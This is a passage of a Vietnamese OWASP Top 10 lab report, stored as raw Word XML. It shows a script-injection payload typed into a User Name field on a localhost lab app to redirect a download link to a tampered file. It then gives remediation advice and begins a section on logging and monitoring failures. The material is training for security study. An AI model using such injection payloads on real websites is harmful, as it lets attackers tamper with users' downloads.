    <w:p w14:paraId="5911A35B" w14:textId="5B96BD31" w:rsidR="0065424E" w:rsidRDefault="00FB5E78" w:rsidP="0065424E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB5E78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00FB5E78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 5:</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00F66525">
        <w:t xml:space="preserve"> Với ý tưởng trên, thực hiện đoạn mã </w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00FB5E78">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00F66525">
        <w:t xml:space="preserve"> để thực hiện các thao tác trên DOM (Document Object Model) của trang web như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B4B1F4" w14:textId="77777777" w:rsidR="0065424E" w:rsidRPr="00FB5E78" w:rsidRDefault="0065424E" w:rsidP="00FB5E78">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Hlk162962446"/>
      <w:r w:rsidRPr="00FB5E78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;script&gt;document.getElementById("download_link").href = "/static/fake.txt";&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="49"/>
    <w:p w14:paraId="731B9396" w14:textId="77777777" w:rsidR="0065424E" w:rsidRPr="00FB5E78" w:rsidRDefault="0065424E" w:rsidP="00FB5E78">
      <w:r w:rsidRPr="00FB5E78">
        <w:t>Trong đó:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F9D94E" w14:textId="2993C6E0" w:rsidR="0065424E" w:rsidRPr="00F66525" w:rsidRDefault="0065424E" w:rsidP="00B44E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB5E78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>document.getElementById("download_link")</w:t>
      </w:r>
      <w:r w:rsidRPr="00F66525">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB5E78">
        <w:t xml:space="preserve">là phần của DOM API, nó lấy ra phần tử HTML có id là </w:t>
      </w:r>
      <w:r w:rsidR="00FB5E78" w:rsidRPr="00FB5E78">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB5E78">
        <w:t>download_link</w:t>
      </w:r>
      <w:r w:rsidR="00FB5E78" w:rsidRPr="00FB5E78">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB5E78">
        <w:t xml:space="preserve">. Điều này giả định rằng trên trang web có một phần tử HTML với id là </w:t>
      </w:r>
      <w:r w:rsidR="00FB5E78" w:rsidRPr="00FB5E78">
        <w:t>“download_link”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231249E6" w14:textId="77777777" w:rsidR="0065424E" w:rsidRPr="00F66525" w:rsidRDefault="0065424E" w:rsidP="00B44E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB5E78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.href</w:t>
      </w:r>
      <w:r w:rsidRPr="00F66525">
        <w:t xml:space="preserve"> là </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB5E78">
        <w:t>thuộc tính của phần tử HTML, trong trường hợp này là một liên kết (hyperlink). Nó cho phép truy cập hoặc thay đổi URL của liên kết đó.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA9B7C0" w14:textId="4E7796CC" w:rsidR="0065424E" w:rsidRPr="00FB5E78" w:rsidRDefault="0065424E" w:rsidP="00B44E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB5E78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>"/static/fake.txt"</w:t>
      </w:r>
      <w:r w:rsidRPr="00F66525">
        <w:t xml:space="preserve"> là </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB5E78">
        <w:t xml:space="preserve">URL mới mà chúng ta muốn gán cho thuộc tính href. Điều này có nghĩa là khi JavaScript được thực thi, nó sẽ thay đổi URL của liên kết có id </w:t>
      </w:r>
      <w:r w:rsidR="00FB5E78" w:rsidRPr="00FB5E78">
        <w:t xml:space="preserve">“download_link” </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB5E78">
        <w:t xml:space="preserve">để trỏ đến </w:t>
      </w:r>
      <w:r w:rsidR="00FB5E78" w:rsidRPr="00FB5E78">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB5E78">
        <w:t>/static/fake.txt</w:t>
      </w:r>
      <w:r w:rsidR="00FB5E78" w:rsidRPr="00FB5E78">
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467FCA4B" w14:textId="38139709" w:rsidR="00FB5E78" w:rsidRPr="00FB5E78" w:rsidRDefault="00FB5E78" w:rsidP="0065424E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="0065424E">
        <w:t>hực hiện như sau</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, nhập </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>vào ô User Name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> đoạn code và enter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB7155E" w14:textId="77777777" w:rsidR="00FB5E78" w:rsidRDefault="0065424E" w:rsidP="00FB5E78">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB5E78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;script&gt;document.getElementById("download_link").href = "/static/fake.txt";&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455245E5" w14:textId="50EA0B0F" w:rsidR="0065424E" w:rsidRDefault="0065424E" w:rsidP="00FB5E78">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F66525">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="205BF54B" wp14:editId="02DE0DE6">
            <wp:extent cx="4915586" cy="1952898"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="146748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8818" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId99"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4915586" cy="1952898"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="005030A5" w14:textId="77777777" w:rsidR="0065424E" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5DD9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BC7E741" wp14:editId="5EFF7305">
            <wp:extent cx="4610337" cy="1644735"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="868920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20957" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId100"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4610337" cy="1644735"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F66E43D" w14:textId="77777777" w:rsidR="0065424E" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5DD9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08EC5F76" wp14:editId="6F16E0C5">
            <wp:extent cx="5115639" cy="1143160"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1800067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67886" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId101"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5115639" cy="1143160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="494EB7C7" w14:textId="1B30D9E6" w:rsidR="0065424E" w:rsidRPr="00FB5E78" w:rsidRDefault="00FB5E78" w:rsidP="00FB5E78">
      <w:r w:rsidRPr="00FB5E78">
        <w:t xml:space="preserve">Bây giờ </w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00FB5E78">
        <w:t xml:space="preserve">file </w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00FB5E78">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>fake.txt</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00FB5E78">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB5E78">
        <w:t xml:space="preserve">đã được tải </w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00FB5E78">
        <w:t xml:space="preserve">về thành công, sau đó tiến hành kiểm tra file này và </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB5E78">
        <w:t xml:space="preserve">thấy </w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00FB5E78">
        <w:t xml:space="preserve">nội dung đã bị thay đổi. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB5E78">
        <w:t xml:space="preserve">Việc </w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00FB5E78">
        <w:t>thực hiện khai thác thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C18475D" w14:textId="65D92B11" w:rsidR="0065424E" w:rsidRPr="0065424E" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:r w:rsidRPr="007F5DD9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BB9DA87" wp14:editId="04015BB7">
            <wp:extent cx="6068272" cy="1648055"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="1137839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39449" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId102"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6068272" cy="1648055"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5C5BE5" w14:textId="03905D9C" w:rsidR="0065424E" w:rsidRPr="0065424E" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mức độ ảnh hưởng của lỗ hổng:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB5E78">
        <w:t>High (cao)</w:t>
      </w:r>
      <w:r w:rsidR="00FB5E78" w:rsidRPr="00FB5E78">
        <w:t xml:space="preserve"> v</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB5E78">
        <w:t>ì kẻ tấn công có thể thay đổi dữ liệu được tải về, gây ra nguy cơ về tính toàn vẹn của dữ liệu và đe dọa sự tin cậy của hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E832854" w14:textId="4D16C0A0" w:rsidR="0065424E" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Khuyến cáo khắc phục:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FB5E78" w:rsidRPr="00FB5E78">
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB5E78">
        <w:t>ần thực hiện lọc đầu vào của phần nhập liệu để ngăn chặn việc chèn các lệnh thực thi vào chương trình, giúp</w:t>
      </w:r>
      <w:r w:rsidRPr="00E87D64">
        <w:t xml:space="preserve"> ngăn chặn việc thay đổi dữ liệu được tải về từ trang web. Ngoài ra, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">có thể </w:t>
      </w:r>
      <w:r w:rsidRPr="00E87D64">
        <w:t xml:space="preserve">triển khai việc sử dụng </w:t>
      </w:r>
      <w:r w:rsidRPr="00E87D64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>checksum</w:t>
      </w:r>
      <w:r w:rsidRPr="00E87D64">
        <w:t xml:space="preserve"> để kiểm tra tính toàn vẹn của dữ liệu được tải về từ trang web. Khi người dùng tải file về, hệ thống sẽ tính toán checksum của file và so sánh nó với checksum được công bố của file. Nếu hai giá trị checksum không khớp, hệ thống sẽ phát hiện ra rằng dữ liệu đã bị thay đổi và có thể từ chối việc sử dụng dữ liệu này. Điều này sẽ giúp ngăn chặn các cuộc tấn công như thay đổi dữ liệu một cách không phù hợp và tăng cường tính toàn vẹn của dữ liệu tải về từ trang web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C494CD9" w14:textId="77777777" w:rsidR="00FC6546" w:rsidRDefault="00FC6546">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFE5547" w14:textId="6B26D86A" w:rsidR="00151DDF" w:rsidRPr="00955E98" w:rsidRDefault="00151DDF" w:rsidP="00151DDF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="432" w:hanging="432"/>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_Toc182909866"/>
      <w:r w:rsidRPr="00955E98">
        <w:lastRenderedPageBreak/>
        <w:t>A09:2021 – Security Logging and Monitoring Failures</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w14:paraId="1B187FA5" w14:textId="436459B3" w:rsidR="00151DDF" w:rsidRDefault="00151DDF" w:rsidP="00F41059">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc182909867"/>
      <w:r w:rsidRPr="00151DDF">
        <w:t>Mô tả lỗ hổng</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w14:paraId="15E5AADF" w14:textId="6E525DBD" w:rsidR="00151DDF" w:rsidRPr="00FC6546" w:rsidRDefault="00FC6546" w:rsidP="00FC6546">
      <w:r w:rsidRPr="00FC6546">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="002A3AFF" w:rsidRPr="00FC6546">
        <w:t>Việc không ghi nhật ký, giám sát hoặc báo cáo đầy đủ các sự kiện bảo mật, chẳng hạn nh</w:t>
      </w:r>
      <w:r w:rsidR="002A3AFF" w:rsidRPr="00FC6546">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidR="002A3AFF" w:rsidRPr="00FC6546">
        <w:t xml:space="preserve"> các lần thử đăng nhập, khiến hành vi đáng ngờ khó bị phát hiện và làm tăng đáng kể khả năng kẻ tấn công có thể khai thác thành công ứng dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027D5FA9" w14:textId="35A4895B" w:rsidR="00C96847" w:rsidRDefault="00C96847" w:rsidP="00F41059">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Toc182909868"/>
      <w:r>
        <w:t>Biện pháp ngăn chặn</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w14:paraId="3C0D065D" w14:textId="6DD86379" w:rsidR="00630D4C" w:rsidRPr="00FC6546" w:rsidRDefault="00630D4C" w:rsidP="00FC6546">
      <w:r w:rsidRPr="00FC6546">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Ghi log lỗi truy cập và xác thực với đủ thông tin để điều tra.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6546">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6546">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6546">
        <w:t xml:space="preserve"> Nếu phát hiện nhiều lần đăng nhập thất bại từ cùng một IP, hệ thống sẽ ghi lại thông tin như địa chỉ IP, tên tài khoản, thời gian và loại lỗi để giúp xác định tài khoản bị tấn công hoặc hoạt động đáng ngờ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0412C0" w14:textId="08F60D5D" w:rsidR="00630D4C" w:rsidRPr="00FC6546" w:rsidRDefault="00630D4C" w:rsidP="00FC6546">
      <w:r w:rsidRPr="00FC6546">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Đảm bảo log được tạo ra ở định dạng mà các giải pháp quản lý log có thể dễ dàng xử lý.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6546">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6546">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6546">
        <w:t xml:space="preserve"> Các log nên được định dạng theo JSON hoặc XML để hệ thống quản lý log như ELK stack có thể đọc và phân tích dữ liệu một cách dễ dàng, hỗ trợ việc tạo </w:t>
      </w:r>
      <w:r w:rsidR="00FC6546" w:rsidRPr="00FC6546">
        <w:t>các dashboard</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6546">
        <w:t xml:space="preserve"> và cảnh báo theo yêu cầu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40699663" w14:textId="5C2ACAAA" w:rsidR="00401CCB" w:rsidRPr="00FC6546" w:rsidRDefault="00630D4C" w:rsidP="00FC6546">
      <w:r w:rsidRPr="00FC6546">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Đảm bảo dữ liệu log được mã hóa đúng cách</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6546">
        <w:t xml:space="preserve"> để ngăn chặn các cuộc tấn công chèn mã hoặc tấn công vào hệ thống logging hoặc monitoring. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6546">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6546">
        <w:t xml:space="preserve"> Nếu ứng dụng ghi log các truy vấn SQL, cần mã hóa các chuỗi trước khi ghi để tránh các cuộc tấn công SQL Injection nhắm vào chính hệ thống log.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DBC7DB" w14:textId="2B1E1F68" w:rsidR="00630D4C" w:rsidRPr="00FC6546" w:rsidRDefault="00630D4C" w:rsidP="00FC6546">
      <w:r w:rsidRPr="00FC6546">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Đảm bảo các giao dịch có giá trị cao có một lịch sử kiểm tra với các biện pháp kiểm soát tính toàn vẹn</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6546">
        <w:t xml:space="preserve"> để ngăn chặn sửa đổi hoặc xóa, như sử dụng các bảng cơ sở dữ liệu chỉ cho phép thêm dữ liệu (append-only). </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6546">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6546">
        <w:t xml:space="preserve"> Các giao dịch chuyển tiền trong ngân hàng nên có một lịch sử ghi nhận chi tiết và không thể thay đổi để đảm bảo không có dữ liệu bị xóa hoặc chỉnh sửa sau khi hoàn tất giao dịch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C100F6C" w14:textId="0EE16ED7" w:rsidR="00630D4C" w:rsidRPr="00FC6546" w:rsidRDefault="00630D4C" w:rsidP="00FC6546">
      <w:r w:rsidRPr="00FC6546">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Đội DevSecOps cần thiết lập hệ thống giám sát và cảnh báo hiệu quả</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6546">
        <w:t xml:space="preserve"> để phát hiện và phản ứng nhanh chóng với các hoạt động đáng ngờ. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6546">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6546">
        <w:t xml:space="preserve"> Hệ thống có thể thiết lập </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6546">
        <w:lastRenderedPageBreak/>
        <w:t>cảnh báo khi phát hiện các hành vi như truy cập bất thường vào các tài khoản quản trị, giúp đội bảo mật can thiệp ngay khi có dấu hiệu xâm nhập.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64377E0C" w14:textId="0FB9A0E9" w:rsidR="00630D4C" w:rsidRPr="00FC6546" w:rsidRDefault="0051641F" w:rsidP="00FC6546">
      <w:r w:rsidRPr="00FC6546">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Thiết lập hoặc áp dụng một kế hoạch phản ứng và khôi phục sự cố</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6546">
        <w:t>, như tiêu chuẩn NIST 800-61r2 hoặc phiên bản mới hơn.</w:t>
      </w:r>
      <w:r w:rsidR="00263C02" w:rsidRPr="00FC6546">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6546">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6546">
        <w:t xml:space="preserve"> Khi phát hiện một vụ xâm nhập, đội bảo mật có thể nhanh chóng triển khai kế hoạch phản ứng, bao gồm các bước cách ly hệ thống bị ảnh hưởng và khôi phục từ bản sao lưu an toàn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D8DCE5" w14:textId="77777777" w:rsidR="00151DDF" w:rsidRPr="00151DDF" w:rsidRDefault="00151DDF" w:rsidP="00F41059">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_Toc182909869"/>
      <w:r w:rsidRPr="00151DDF">
        <w:t>Kịch bản tấn công thực hành</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w14:paraId="6E207EFD" w14:textId="053E6E1A" w:rsidR="00031203" w:rsidRDefault="00031203" w:rsidP="00031203">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc182909870"/>
      <w:r w:rsidRPr="00031203">
        <w:t>Bài thực hành – Lab 1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w14:paraId="486792AF" w14:textId="0721408B" w:rsidR="004E0865" w:rsidRPr="004E0865" w:rsidRDefault="004E0865" w:rsidP="004E0865">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E0865">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Truy cập vào: </w:t>
      </w:r>
      <w:hyperlink r:id="rId103" w:history="1">
        <w:r w:rsidRPr="004E0865">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>http://localhost:8000/a10_lab</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0D7B0766" w14:textId="74C394BE" w:rsidR="0065424E" w:rsidRPr="0065424E" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tiêu đề: </w:t>
      </w:r>
      <w:r w:rsidRPr="00452300">
        <w:t>Security Logging and Monitoring Failures</w:t>
      </w:r>
      <w:r w:rsidR="001035B9">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF8C3C5" w14:textId="0EC265AD" w:rsidR="0065424E" w:rsidRPr="00FC6546" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mô tả lỗ hổng:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
